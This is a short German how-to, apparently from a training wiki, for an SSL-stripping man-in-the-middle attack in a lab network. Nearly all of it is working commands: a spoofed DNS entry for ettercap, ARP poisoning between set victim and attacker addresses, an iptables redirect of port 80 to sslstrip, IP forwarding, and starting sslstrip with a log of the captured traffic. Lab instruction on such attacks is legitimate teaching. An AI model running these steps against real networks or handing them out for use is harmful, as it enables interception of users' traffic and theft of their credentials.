Ssl strip anwenden
Vorbermerkung
Da python2 als obsolet gilt muss sslstrip auf einem älteren System laufen.
- kali
host anlegen
- echo -e "www.xinux.de A 10.0.10.104" > /etc/ettercap/etter.dns
ettercap mit dns plugin starten
- OPFER=10.0.10.102
- ANGREIFER=10.0.10.101
- ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//
nat prerouting
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
forwarding
- echo 1 > /proc/sys/net/ipv4/ip_forward
Install
- apt-get install sslstrip
sslstrip starten
- sslstrip -a -f -k -w sslstrip.log
log
- cat sslstrip.log